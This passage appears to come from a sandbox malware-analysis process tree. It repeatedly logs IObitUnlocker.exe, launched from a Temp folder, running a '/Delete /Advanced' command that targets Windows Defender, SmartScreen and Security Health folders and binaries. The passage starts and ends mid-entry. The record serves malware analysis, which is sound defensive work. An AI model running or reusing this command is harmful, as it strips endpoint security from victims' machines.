Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 